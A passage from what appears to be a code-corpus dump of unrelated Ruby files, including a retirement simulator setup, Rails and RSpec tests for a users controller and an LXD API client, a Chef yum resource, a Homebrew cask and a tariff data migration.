type: :_401k,
balances: {
stocks: 200_000_00,
}
)
end
sim.add_job(:partner) do |plan|
plan.beginning do |p|
p.set(
base: 75_000_00,
)
p.add_savings_plan(
percent: 7,
match: 3,
account: partner_401k,
holding: :stocks
)
end
plan.on(partner_retirement).stop
end
sim.add_social_security(:partner) do |plan|
plan.on(partner_retirement).start(
pia: 1000_00
)
end
# Start by spending the leftovers (after tax and saving) and change to
# spending an exact amount in retirement
sim.add_spending_strategy do |plan|
plan.beginning.set(
strategy: :remainder
)
plan.on(primary_retirement).set(
strategy: :percent,
percent: 4
)
# plan.on(primary_retirement).set(
# strategy: :dynamic,
# end_year: 2058,
# withdrawal_rates: [3.70,3.78,3.85,3.90,4,4.10,4.20,4.30,4.50,4.70,4.80,5.00,5.15,5.40,5.70,6.00,6.20,6.85,7.30,7.55,8.70,9.70,10.70,12.15,14.15,16.53,20.27,20.27,20.27,20.27].reverse
# )
end
sim.add_tax_strategy do |plan|
plan.beginning.set(
primary: :married_filing_jointly,
partner: :married_filing_jointly
)
end
sim
end
def self.create_sim_tax_sequence
sim = FortuneTeller.new(Date.today)
sim.add_primary(
gender: :female,
birthday: Date.new(1964, 3, 2)
)
sim.add_partner(
gender: :male,
birthday: Date.new(1966, 5, 5)
)
# Define primary's key events and holdings
primary_retirement = Date.new(2031, 3, 1)
primary_401k = sim.add_account(:primary) do |plan|
plan.beginning.set(
type: :_401k,
balances: {
stocks: 120_000_00,
bonds: 80_000_00
}
)
end
sim.add_account(:primary) do |plan|
plan.beginning.set(
type: :roth_ira,
balances: {
stocks: 120_000_00,
bonds: 80_000_00
}
)
end
sim.add_account(:primary) do |plan|
plan.beginning.set(
type: :brokerage,
balances: {
stocks: 100_000_00,
bonds: 100_000_00
}
)
end
sim.add_job(:primary) do |plan|
plan.beginning do |p|
p.set(
base: 100_000_00,
)
p.add_savings_plan(
percent: 7,
match: 3,
account: primary_401k,
holding: :stocks
)
end
plan.on(primary_retirement).stop
end
sim.add_social_security(:primary) do |plan|
plan.on(primary_retirement).start
end
# Define partner's key events and holdings
partner_retirement = Date.new(2033, 5, 1)
partner_401k = sim.add_account(:partner) do |plan|
plan.beginning.set(
type: :_401k,
balances: {
stocks: 200_000_00,
}
)
end
sim.add_job(:partner) do |plan|
plan.beginning do |p|
p.set(
base: 75_000_00,
)
p.add_savings_plan(
percent: 7,
match: 3,
account: partner_401k,
holding: :stocks
)
end
plan.on(partner_retirement).stop
end
sim.add_social_security(:partner) do |plan|
plan.on(partner_retirement).start(
pia: 1000_00
)
end
# Start by spending the leftovers (after tax and saving) and change to
# spending an exact amount in retirement
sim.add_spending_strategy do |plan|
plan.beginning.set(
strategy: :remainder
)
plan.on(primary_retirement).set(
strategy: :percent,
percent: 6
)
end
sim.add_tax_strategy do |plan|
plan.beginning.set(
primary: :married_filing_jointly,
partner: :married_filing_jointly
)
end
sim.set_debit_strategy(:tax_sequence)
sim
end
end
end
| 24.107895 | 194 | 0.534112 |
1dc6af82a8d47cef51844ed7dc6b91531b9a5fe3 | 1,646 | require 'test_helper'
class UsersControllerTest < ActionDispatch::IntegrationTest
def setup
@user = users(:michael)
@other_user = users(:archer)
end
test "should redirect index when not logged in" do
get users_path
assert_redirected_to login_url
end
test "should get new" do
get signup_path
assert_response :success
end
test "should redirect edit when not logged in" do
get edit_user_path(@user)
assert_not flash.empty?
assert_redirected_to login_url
end
test "should redirect update when not logged in" do
patch user_path(@user), params: { user: { name: @user.name,
email: @user.email } }
assert_not flash.empty?
assert_redirected_to login_url
end
test "should not allow the admin attribute to be edited via the web" do
log_in_as(@other_user)
assert_not @other_user.admin?
patch user_path(@other_user), params: {
user: { password: @other_user.password_digest,
password_confirmation: @other_user.password_digest,
admin: 1 } }
#assert_not @other_user.FILLIN.admin?
end
test "should redirect destroy when not logged in" do
assert_no_difference 'User.count' do
delete user_path(@user)
end
assert_redirected_to login_url
end
test "should redirect destroy when logged in as a non-admin" do
log_in_as(@other_user)
assert_no_difference 'User.count' do
delete user_path(@user)
end
assert_redirected_to root_url
end
end
| 26.548387 | 95 | 0.641555 |
d5d6ddea4bd03d3bc11b8c3c9078b83640b4c151 | 7,438 | #
# Cookbook Name:: yum
# Resource:: repository
#
# Author:: Sean OMeara <[email protected]>
# Copyright 2013, Chef
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
actions :create, :delete
default_action :create
# http://linux.die.net/man/5/yum.conf
attribute :alwaysprompt, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :assumeyes, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :bandwidth, :kind_of => String, :regex => /^\d+/, :default => nil
attribute :bugtracker_url, :kind_of => String, :regex => /.*/, :default => nil
attribute :clean_requirements_on_remove, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :cachedir, :kind_of => String, :regex => /.*/, :default => '/var/cache/yum/$basearch/$releasever'
attribute :color, :kind_of => String, :equal_to => %w(always never), :default => nil
attribute :color_list_available_downgrade, :kind_of => String, :regex => /.*/, :default => nil
attribute :color_list_available_install, :kind_of => String, :regex => /.*/, :default => nil
attribute :color_list_available_reinstall, :kind_of => String, :regex => /.*/, :default => nil
attribute :color_list_available_upgrade, :kind_of => String, :regex => /.*/, :default => nil
attribute :color_list_installed_extra, :kind_of => String, :regex => /.*/, :default => nil
attribute :color_list_installed_newer, :kind_of => String, :regex => /.*/, :default => nil
attribute :color_list_installed_older, :kind_of => String, :regex => /.*/, :default => nil
attribute :color_list_installed_reinstall, :kind_of => String, :regex => /.*/, :default => nil
attribute :color_search_match, :kind_of => String, :regex => /.*/, :default => nil
attribute :color_update_installed, :kind_of => String, :regex => /.*/, :default => nil
attribute :color_update_local, :kind_of => String, :regex => /.*/, :default => nil
attribute :color_update_remote, :kind_of => String, :regex => /.*/, :default => nil
attribute :commands, :kind_of => String, :regex => /.*/, :default => nil
attribute :debuglevel, :kind_of => String, :regex => /^\d+$/, :default => '2'
attribute :diskspacecheck, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :distroverpkg, :kind_of => String, :regex => /.*/, :default => nil
attribute :enable_group_conditionals, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :errorlevel, :kind_of => String, :regex => /^\d+$/, :default => nil
attribute :exactarch, :kind_of => [TrueClass, FalseClass], :default => true
attribute :exclude, :kind_of => String, :regex => /.*/, :default => nil
attribute :gpgcheck, :kind_of => [TrueClass, FalseClass], :default => true
attribute :group_package_types, :kind_of => String, :regex => /.*/, :default => nil
attribute :groupremove_leaf_only, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :history_list_view, :kind_of => String, :equal_to => %w(users commands single-user-commands), :default => nil
attribute :history_record, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :history_record_packages, :kind_of => String, :regex => /.*/, :default => nil
attribute :http_caching, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :installonly_limit, :kind_of => String, :regex => [/^\d+/, /keep/], :default => '3'
attribute :installonlypkgs, :kind_of => String, :regex => /.*/, :default => nil
attribute :installroot, :kind_of => String, :regex => /.*/, :default => nil
attribute :keepalive, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :keepcache, :kind_of => [TrueClass, FalseClass], :default => false
attribute :kernelpkgnames, :kind_of => String, :regex => /.*/, :default => nil
attribute :localpkg_gpgcheck, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :logfile, :kind_of => String, :regex => /.*/, :default => '/var/log/yum.log'
attribute :max_retries, :kind_of => String, :regex => /^\d+$/, :default => nil
attribute :mdpolicy, :kind_of => String, :equal_to => %w(instant group:primary group:small group:main group:all), :default => nil
attribute :metadata_expire, :kind_of => String, :regex => [/^\d+$/, /^\d+[mhd]$/, /never/], :default => nil
attribute :mirrorlist_expire, :kind_of => String, :regex => /^\d+$/, :default => nil
attribute :multilib_policy, :kind_of => String, :equal_to => %w(all best), :default => nil
attribute :obsoletes, :kind_of => [TrueClass, FalseClass], :default => true
attribute :overwrite_groups, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :password, :kind_of => String, :regex => /.*/, :default => nil
attribute :path, :kind_of => String, :regex => /.*/, :default => nil, :name_attribute => true
attribute :persistdir, :kind_of => String, :regex => /.*/, :default => nil
attribute :pluginconfpath, :kind_of => String, :regex => /.*/, :default => nil
attribute :pluginpath, :kind_of => String, :regex => /.*/, :default => nil
attribute :plugins, :kind_of => [TrueClass, FalseClass], :default => true
attribute :protected_multilib, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :protected_packages, :kind_of => String, :regex => /.*/, :default => nil
attribute :proxy, :kind_of => String, :regex => /.*/, :default => nil
attribute :proxy_password, :kind_of => String, :regex => /.*/, :default => nil
attribute :proxy_username, :kind_of => String, :regex => /.*/, :default => nil
attribute :recent, :kind_of => String, :regex => /^\d+$/, :default => nil
attribute :releasever, :kind_of => String, :regex => /.*/, :default => nil
attribute :repo_gpgcheck, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :reset_nice, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :rpmverbosity, :kind_of => String, :equal_to => %w(info critical emergency error warn debug), :default => nil
attribute :showdupesfromrepos, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :skip_broken, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :ssl_check_cert_permissions, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :sslcacert, :kind_of => String, :regex => /.*/, :default => nil
attribute :sslclientcert, :kind_of => String, :regex => /.*/, :default => nil
attribute :sslclientkey, :kind_of => String, :regex => /.*/, :default => nil
attribute :sslverify, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :syslog_device, :kind_of => String, :regex => /.*/, :default => nil
attribute :syslog_facility, :kind_of => String, :regex => /.*/, :default => nil
attribute :syslog_ident, :kind_of => String, :regex => /.*/, :default => nil
attribute :throttle, :kind_of => String, :regex => [/\d+k/, /\d+M/, /\d+G/], :default => nil
attribute :timeout, :kind_of => String, :regex => /^\d+$/, :default => nil
attribute :tolerant, :kind_of => [TrueClass, FalseClass], :default => nil
attribute :tsflags, :kind_of => String, :regex => /.*/, :default => nil
attribute :username, :kind_of => String, :regex => /.*/, :default => nil
| 70.169811 | 129 | 0.683383 |
ac6910fed8a5c271c846694c0a18747bf411bca3 | 16,438 | require 'spec_helper'
require 'json'
describe Hyperkit::Client do
describe "module configuration" do
before do
Hyperkit.configure do |config|
Hyperkit::Configurable.keys.each do |key|
config.send("#{key}=", "Some #{key}")
end
end
end
it "inherits the module configuration" do
client = Hyperkit::Client.new
Hyperkit::Configurable.keys.each do |key|
expect(client.instance_variable_get(:"@#{key}")).to eq("Some #{key}")
end
end
describe "with class level configuration" do
before do
@opts = {
:client_cert => '/tmp/cert',
:client_key => '/tmp/key',
:auto_sync => false
}
end
it "overrides module configuration" do
client = Hyperkit::Client.new(@opts)
expect(client.client_cert).to eq('/tmp/cert')
expect(client.client_key).to eq('/tmp/key')
expect(client.auto_sync).to eq(false)
end
it "can set configuration after initialization" do
client = Hyperkit::Client.new
client.configure do |config|
@opts.each do |key, value|
config.send("#{key}=", value)
end
end
expect(client.client_cert).to eq('/tmp/cert')
expect(client.client_key).to eq('/tmp/key')
expect(client.auto_sync).to eq(false)
end
end
end
describe "content type" do
it "sets a default Content-Type header" do
profile_request = stub_post("/1.0/profiles").
with({
:headers => {"Content-Type" => "application/json"}})
Hyperkit.client.post "/1.0/profiles", {}
assert_requested profile_request
end
end
describe "auto_sync" do
before(:each) do
@client = Hyperkit.client
Hyperkit.reset!
expect(Hyperkit.auto_sync).to eq(true)
expect(Hyperkit.client.auto_sync).to eq(true)
end
describe "with module level config" do
it "configures auto-synchronization with .configure" do
Hyperkit.configure do |config|
config.auto_sync = false
end
expect(Hyperkit.client.auto_sync).to eq(false)
end
it "configures auto-synchronization with module methods" do
Hyperkit.auto_sync = false
expect(Hyperkit.client.auto_sync).to eq(false)
end
end
describe "with class level config" do
it "configures auto-synchronization with .configure" do
@client.configure do |config|
config.auto_sync = false
end
expect(@client.auto_sync).to eq(false)
end
it "configures auto-synchronization with instance methods" do
@client.auto_sync = false
expect(@client.auto_sync).to eq(false)
end
end
end
describe "authentication" do
before do
@client = Hyperkit.client
end
describe "with module level config" do
it "sets client credentials with .configure" do
Hyperkit.configure do |config|
config.client_cert = '/tmp/cert'
config.client_key = '/tmp/key'
end
expect(Hyperkit.client.client_cert).to eq('/tmp/cert')
expect(Hyperkit.client.client_key).to eq('/tmp/key')
end
it "sets client credentials with module methods" do
Hyperkit.client_cert = '/tmp/cert'
Hyperkit.client_key = '/tmp/key'
expect(Hyperkit.client.client_cert).to eq('/tmp/cert')
expect(Hyperkit.client.client_key).to eq('/tmp/key')
end
end
describe "with class level config" do
it "sets client credentials with .configure" do
@client.configure do |config|
config.client_cert = '/tmp/cert'
config.client_key = '/tmp/key'
end
expect(@client.client_cert).to eq('/tmp/cert')
expect(@client.client_key).to eq('/tmp/key')
end
it "sets client credentials with instance methods" do
@client.client_cert = '/tmp/cert'
@client.client_key = '/tmp/key'
expect(@client.client_cert).to eq('/tmp/cert')
expect(@client.client_key).to eq('/tmp/key')
end
end
end
describe ".agent" do
it "acts like a Sawyer agent" do
expect(Hyperkit.client.agent).to respond_to :start
end
it "caches the agent" do
agent = Hyperkit.client.agent
expect(agent.object_id).to eq(Hyperkit.client.agent.object_id)
end
end # .agent
describe ".root" do
it "fetches the API root" do
VCR.use_cassette 'root' do
root = Hyperkit.client.root
expect(root[:metadata]).to eq(['/1.0'])
end
end
end # .root
describe ".last_response", :vcr do
it "caches the last agent response" do
client = Hyperkit::Client.new(api_endpoint: 'https://192.168.103.101:8443', verify_ssl: false)
expect(client.last_response).to be_nil
client.get "/"
expect(client.last_response.status).to eq(200)
end
end # .last_response
describe ".get", :vcr do
it "handles query params" do
Hyperkit.get "/", :foo => "bar"
assert_requested :get, "https://192.168.103.101:8443?foo=bar"
end
it "handles headers" do
request = stub_get("/zen").
with(:query => {:foo => "bar"}, :headers => {:accept => "text/plain"})
Hyperkit.get "/zen", :foo => "bar", :accept => "text/plain"
assert_requested request
end
end # .get
describe ".head", :vcr do
it "handles query params" do
Hyperkit.head "/", :foo => "bar"
assert_requested :head, "https://192.168.103.101:8443?foo=bar"
end
it "handles headers" do
request = stub_head("/zen").
with(:query => {:foo => "bar"}, :headers => {:accept => "text/plain"})
Hyperkit.head "/zen", :foo => "bar", :accept => "text/plain"
assert_requested request
end
end # .head
describe "when making requests" do
before do
@client = Hyperkit.client
end
it "Accepts application/json by default" do
VCR.use_cassette 'root' do
root_request = stub_get("/").
with(:headers => {:accept => "application/json"})
@client.get "/"
assert_requested root_request
expect(@client.last_response.status).to eq(200)
end
end
it "allows Accept'ing another media type" do
root_request = stub_get("/").
with(:headers => {:accept => "application/vnd.lxd.beta.diff+json"})
@client.get "/", :accept => "application/vnd.lxd.beta.diff+json"
assert_requested root_request
expect(@client.last_response.status).to eq(200)
end
it "sets a default user agent" do
root_request = stub_get("/").
with(:headers => {:user_agent => Hyperkit::Default.user_agent})
@client.get "/"
assert_requested root_request
expect(@client.last_response.status).to eq(200)
end
it "sets a custom user agent" do
user_agent = "Mozilla/5.0 I am Spartacus!"
root_request = stub_get("/").
with(:headers => {:user_agent => user_agent})
client = Hyperkit::Client.new(:user_agent => user_agent)
client.get "/"
assert_requested root_request
expect(client.last_response.status).to eq(200)
end
it "sets a proxy server" do
Hyperkit.configure do |config|
config.proxy = 'http://proxy.example.com:80'
end
conn = Hyperkit.client.send(:agent).instance_variable_get(:"@conn")
expect(conn.proxy[:uri].to_s).to eq('http://proxy.example.com')
end
it "passes along request headers for POST" do
headers = {"X-LXD-Foo" => "bar"}
root_request = stub_post("/").
with(:headers => headers).
to_return(:status => 201)
client = Hyperkit::Client.new
client.post "/", :headers => headers
assert_requested root_request
expect(client.last_response.status).to eq(201)
end
end
describe "redirect handling" do
it "follows redirect for 301 response" do
client = Hyperkit::Client.new
original_request = stub_get("/foo").
to_return(:status => 301, :headers => { "Location" => "/bar" })
redirect_request = stub_get("/bar").to_return(:status => 200)
client.get("/foo")
assert_requested original_request
assert_requested redirect_request
end
it "follows redirect for 302 response" do
client = Hyperkit::Client.new
original_request = stub_get("/foo").
to_return(:status => 302, :headers => { "Location" => "/bar" })
redirect_request = stub_get("/bar").to_return(:status => 200)
client.get("/foo")
assert_requested original_request
assert_requested redirect_request
end
it "follows redirect for 307 response" do
client = Hyperkit::Client.new
original_request = stub_post(lxd_url("/foo")).
with(:body => { :some_property => "some_value" }.to_json).
to_return(:status => 307, :headers => { "Location" => "/bar" })
redirect_request = stub_post(lxd_url("/bar")).
with(:body => { :some_property => "some_value" }.to_json).
to_return(:status => 201, :headers => { "Location" => "/bar" })
client.post("/foo", { :some_property => "some_value" })
assert_requested original_request
assert_requested redirect_request
end
it "follows redirects for supported HTTP methods" do
client = Hyperkit::Client.new
http_methods = [:head, :get, :post, :put, :patch, :delete]
http_methods.each do |http|
original_request = stub_request(http, lxd_url("/foo")).
to_return(:status => 301, :headers => { "Location" => "/bar" })
redirect_request = stub_request(http, lxd_url("/bar")).
to_return(:status => 200)
client.send(http, "/foo")
assert_requested original_request
assert_requested redirect_request
end
end
it "does not change HTTP method when following a redirect" do
client = Hyperkit::Client.new
original_request = stub_delete("/foo").
to_return(:status => 301, :headers => { "Location" => "/bar" })
redirect_request = stub_delete("/bar").to_return(:status => 200)
client.delete("/foo")
assert_requested original_request
assert_requested redirect_request
other_methods = [:head, :get, :post, :put, :patch]
other_methods.each do |http|
assert_not_requested http, lxd_url("/bar")
end
end
it "follows at most 3 consecutive redirects" do
client = Hyperkit::Client.new
original_request = stub_get("/a").
to_return(:status => 302, :headers => { "Location" => "/b" })
first_redirect = stub_get("/b").
to_return(:status => 302, :headers => { "Location" => "/c" })
second_redirect = stub_get("/c").
to_return(:status => 302, :headers => { "Location" => "/d" })
third_redirect = stub_get("/d").
to_return(:status => 302, :headers => { "Location" => "/e" })
fourth_redirect = stub_get("/e").to_return(:status => 200)
expect { client.get("/a") }.to raise_error(Hyperkit::Middleware::RedirectLimitReached)
assert_requested original_request
assert_requested first_redirect
assert_requested second_redirect
assert_requested third_redirect
assert_not_requested fourth_redirect
end
end
context "error handling" do
before do
VCR.turn_off!
end
after do
VCR.turn_on!
end
it "raises on 404" do
stub_get('/booya').to_return(:status => 404)
expect { Hyperkit.get('/booya') }.to raise_error Hyperkit::NotFound
end
it "raises on 500" do
stub_get('/boom').to_return(:status => 500)
expect { Hyperkit.get('/boom') }.to raise_error Hyperkit::InternalServerError
end
it "includes a message" do
stub_get('/boom').
to_return \
:status => 422,
:headers => {
:content_type => "application/json",
},
:body => {:message => "Go away"}.to_json
begin
Hyperkit.get('/boom')
rescue Hyperkit::UnprocessableEntity => e
expect(e.message).to include("GET https://192.168.103.101:8443/boom: 422 - Go away")
end
end
it "includes an error" do
stub_get('/boom').
to_return \
:status => 422,
:headers => {
:content_type => "application/json",
},
:body => {:error => "Go away"}.to_json
begin
Hyperkit.get('/boom')
rescue Hyperkit::UnprocessableEntity => e
expect(e.message).to include("GET https://192.168.103.101:8443/boom: 422 - Error: Go away")
end
end
it "includes an error summary" do
stub_get('/boom').
to_return \
:status => 422,
:headers => {
:content_type => "application/json",
},
:body => {
:message => "Go away",
:errors => [
:seriously => "Get out of here",
:no_really => "Leave now"
]
}.to_json
begin
Hyperkit.get('/boom')
rescue Hyperkit::UnprocessableEntity => e
expect(e.message).to include("GET https://192.168.103.101:8443/boom: 422 - Go away")
expect(e.message).to include(" seriously: Get out of here")
expect(e.message).to include(" no_really: Leave now")
end
end
it "exposes errors array" do
stub_get('/boom').
to_return \
:status => 422,
:headers => {
:content_type => "application/json",
},
:body => {
:message => "Go away",
:errors => [
:seriously => "Get out of here",
:no_really => "Leave now"
]
}.to_json
begin
Hyperkit.get('/boom')
rescue Hyperkit::UnprocessableEntity => e
expect(e.errors.first[:seriously]).to eq("Get out of here")
expect(e.errors.first[:no_really]).to eq("Leave now")
end
end
it "raises on asynchronous errors" do
stub_get('/boom').
to_return \
:status => 200,
:headers => {
:content_type => "application/json",
},
:body => {
metadata: {
id: "e81ee5e8-6cce-46fd-b010-2c595ca66ed2",
class: "task",
created_at: Time.parse("2016-03-21 11:00:21 -0400"),
updated_at: Time.parse("2016-03-21 11:00:21 -0400"),
status: "Failure",
status_code: 400,
resources: nil,
metadata: nil,
may_cancel: false,
err:
"The image already exists: c22e4941ad01ef4b5e69908b7de21105e06b8ac7a31e1ccd153826a3b15ee1ba"
}
}.to_json
begin
Hyperkit.get('/boom')
rescue Hyperkit::BadRequest=> e
expect(e.message).to include("400 - Error: The image already exists")
end
end
it "raises on unknown client errors" do
stub_get('/user').to_return \
:status => 418,
:headers => {
:content_type => "application/json",
},
:body => {:message => "I'm a teapot"}.to_json
expect { Hyperkit.get('/user') }.to raise_error Hyperkit::ClientError
end
it "raises on unknown server errors" do
stub_get('/user').to_return \
:status => 509,
:headers => {
:content_type => "application/json",
},
:body => {:message => "Bandwidth exceeded"}.to_json
expect { Hyperkit.get('/user') }.to raise_error Hyperkit::ServerError
end
it "handles documentation URLs in error messages" do
stub_get('/user').to_return \
:status => 415,
:headers => {
:content_type => "application/json",
},
:body => {
:message => "Unsupported Media Type",
:documentation_url => "http://developer.github.com/v3"
}.to_json
begin
Hyperkit.get('/user')
rescue Hyperkit::UnsupportedMediaType => e
msg = "415 - Unsupported Media Type"
expect(e.message).to include(msg)
expect(e.documentation_url).to eq("http://developer.github.com/v3")
end
end
it "handles an error response with an array body" do
stub_get('/user').to_return \
:status => 500,
:headers => {
:content_type => "application/json"
},
:body => [].to_json
expect { Hyperkit.get('/user') }.to raise_error Hyperkit::ServerError
end
end
end
| 31.132576 | 104 | 0.592895 |
abf23650068de43d093b5c4fabab1982e19d3fac | 97 | require 'mina/appsignal/support'
require 'mina/appsignal/tasks'
require 'mina/appsignal/version'
| 24.25 | 32 | 0.814433 |
18557afcb991a991be226e278361ef0ff29f4518 | 1,921 | # frozen_string_literal: true
module Ci
module PipelineEditorHelper
include ChecksCollaboration
def can_view_pipeline_editor?(project)
can_collaborate_with_project?(project)
end
def js_pipeline_editor_data(project)
initial_branch = params[:branch_name]
latest_commit = project.repository.commit(initial_branch) || project.commit
commit_sha = latest_commit ? latest_commit.sha : ''
total_branches = project.repository_exists? ? project.repository.branch_count : 0
{
"ci-config-path": project.ci_config_path_or_default,
"ci-examples-help-page-path" => help_page_path('ci/examples/index'),
"ci-help-page-path" => help_page_path('ci/index'),
"default-branch" => project.default_branch_or_main,
"empty-state-illustration-path" => image_path('illustrations/empty-state/empty-dag-md.svg'),
"initial-branch-name" => initial_branch,
"lint-help-page-path" => help_page_path('ci/lint', anchor: 'check-cicd-syntax'),
"lint-unavailable-help-page-path" => help_page_path('ci/pipeline_editor/index', anchor: 'configuration-validation-currently-not-available-message'),
"needs-help-page-path" => help_page_path('ci/yaml/index', anchor: 'needs'),
"new-merge-request-path" => namespace_project_new_merge_request_path,
"pipeline_etag" => latest_commit ? graphql_etag_pipeline_sha_path(commit_sha) : '',
"pipeline-page-path" => project_pipelines_path(project),
"project-path" => project.path,
"project-full-path" => project.full_path,
"project-namespace" => project.namespace.full_path,
"runner-help-page-path" => help_page_path('ci/runners/index'),
"total-branches" => total_branches,
"yml-help-page-path" => help_page_path('ci/yaml/index')
}
end
end
end
Ci::PipelineEditorHelper.prepend_mod_with('Ci::PipelineEditorHelper')
| 45.738095 | 156 | 0.698594 |
4a133a3ca145679200304792ac5961a699d42093 | 1,269 | # Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'google/apis/doubleclicksearch_v2/service.rb'
require 'google/apis/doubleclicksearch_v2/classes.rb'
require 'google/apis/doubleclicksearch_v2/representations.rb'
module Google
module Apis
# DoubleClick Search API
#
# Reports and modifies your advertising data in DoubleClick Search (for example,
# campaigns, ad groups, keywords, and conversions).
#
# @see https://developers.google.com/doubleclick-search/
module DoubleclicksearchV2
VERSION = 'V2'
REVISION = '20160727'
# View and manage your advertising data in DoubleClick Search
AUTH_DOUBLECLICKSEARCH = 'https://www.googleapis.com/auth/doubleclicksearch'
end
end
end
| 35.25 | 84 | 0.747833 |
9129f545078948d74036da159580d8ddd4a163d5 | 378 | require 'rails_helper'
feature 'Update tax status' do
background do
create(:organization)
login_super_admin
visit '/admin/organizations/parent-agency'
end
scenario 'with tax status' do
fill_in 'organization_tax_status', with: '501(c)(3)'
click_button 'Save changes'
expect(find_field('organization_tax_status').value).to eq '501(c)(3)'
end
end
| 23.625 | 73 | 0.719577 |
873e3f73bb7af87f1e3e99892b336cea49ace7d9 | 607 | module LanguageServer
module Protocol
module Interface
class LinkedEditingRangeOptions
def initialize(work_done_progress: nil)
@attributes = {}
@attributes[:workDoneProgress] = work_done_progress if work_done_progress
@attributes.freeze
end
# @return [boolean]
def work_done_progress
attributes.fetch(:workDoneProgress)
end
attr_reader :attributes
def to_hash
attributes
end
def to_json(*args)
to_hash.to_json(*args)
end
end
end
end
end
| 19.580645 | 83 | 0.601318 |
ac6e84363ad04c34599a85ce6f6fa04ec305cb25 | 245 | require 'test_helper'
class ActivitiesControllerTest < ActionController::TestCase
test "should get index" do
get :index
assert_response :success
end
test "should get show" do
get :show
assert_response :success
end
end
| 16.333333 | 59 | 0.726531 |
e259207c8251cf468c6a743c284a962d114ae9a8 | 1,084 | require_relative 'boot'
require "rails"
# Pick the frameworks you want:
require "active_model/railtie"
require "active_job/railtie"
require "active_record/railtie"
require "active_storage/engine"
require "action_controller/railtie"
require "action_mailer/railtie"
require "action_view/railtie"
require "action_cable/engine"
require "sprockets/railtie"
# require "rails/test_unit/railtie"
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module BlogApp
class Application < Rails::Application
# Initialize configuration defaults for originally generated Rails version.
config.load_defaults 5.2
# Settings in config/environments/* take precedence over those specified here.
# Application configuration can go into files in config/initializers
# -- all .rb files in that directory are automatically loaded after loading
# the framework and any gems in your application.
# Don't generate system test files.
config.generators.system_tests = nil
end
end
| 31.882353 | 82 | 0.77952 |
d51376098458d13bc9ef73e47e0b3f8343b954dc | 834 | cask "wondershare-uniconverter" do
version "12.5.2.6"
sha256 :no_check
url "https://download.wondershare.com/cbs_down/video-converter-ultimate-mac_full735.dmg"
name "UniConverter"
desc "Video editing software"
homepage "https://videoconverter.wondershare.com/"
app "Wondershare UniConverter.app"
zap trash: [
"~/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/com.wondershare.video-converter-ultimate.sfl*",
"~/Library/Caches/com.Wondershare.Video-Converter-Ultimate",
"~/Library/Caches/com.wondershare.helper_compact",
"~/Library/Cookies/com.Wondershare.Video-Converter-Ultimate.binarycookies",
"~/Library/Preferences/com.Wondershare.Video-Converter-Ultimate.plist",
"~/Library/Preferences/com.wondershare.helper_compact",
]
end
| 39.714286 | 161 | 0.772182 |
91bf2dce48ccab67641b2434147df91c79bf8844 | 2,301 | =begin
CHIEF transformer do not handle TAMT (measure type) and RVTT (measure type description)
record types, so we created these records manually.
2019-01-10_KBT009(19010).txt:2
"TAMT ","09/01/2019:10:37:00","I","487","EX","EXF",null,null,"09/01/2019:10:36:00",
2018-12-28_KBT009(18362).txt:4987
"RVTT ","27/12/2018:10:27:00","I","487",null,null,"27/12/2018:10:25:00",null,"N",null,null,"4","N","Y","CIDER AND PERRY EXCEEDING 6.9% - NOT EXCEEDING 7.5% ABV","Y","Y","E",
=end
# !Note - this migration is not completely correct
# Instead of EXF we should use DHG code (487)
# This will be fixed in data migration on 10.12.2019
TradeTariffBackend::DataMigrator.migration do
name 'Create EXF national measure type with description'
up do
applicable do
MeasureType.where(measure_type_id: 'EXF').blank?
false
end
apply do
MeasureType.unrestrict_primary_key
MeasureType.create(measure_type_id: 'EXF',
validity_start_date: Date.new(2019, 1, 9),
validity_end_date: nil,
trade_movement_code: 0,
priority_code: 5,
measure_component_applicable_code: '0',
measure_type_acronym: 'EXF',
origin_dest_code: 0,
order_number_capture_code: 2,
measure_explosion_level: 20,
measure_type_series_id: 'Q',
national: true,
operation: 'C',
operation_date: nil)
MeasureTypeDescription.unrestrict_primary_key
MeasureTypeDescription.create(measure_type_id: 'EXF',
language_id: 'EN',
description: 'EXCISE - FULL, 487, CIDER AND PERRY EXCEEDING 6.9% - NOT EXCEEDING 7.5% ABV',
national: true,
operation: 'C')
end
end
down do
# applicable {
# MeasureType.where(measure_type_id: 'EXF').present?
# }
# apply {
# MeasureTypeDescription.where(measure_type_id: 'EXF').map(&:destroy)
# MeasureType.where(measure_type_id: 'EXF').map(&:destroy)
# }
end
end
| 37.721311 | 179 | 0.564537 |
08c5c7346ffa7fe2d4e69467e44036d4046575df | 6,271 | require 'date'
require_relative '../../lib/params_ready/value/validator.rb'
require_relative '../test_helper'
module ParamsReady
module Value
class ConstraintTest < MiniTest::Test
def test_range_constraint_works_with_numbers
c = Constraint.instance(1..3)
assert(c.valid?(1))
assert(c.valid?(2))
assert(c.valid?(3))
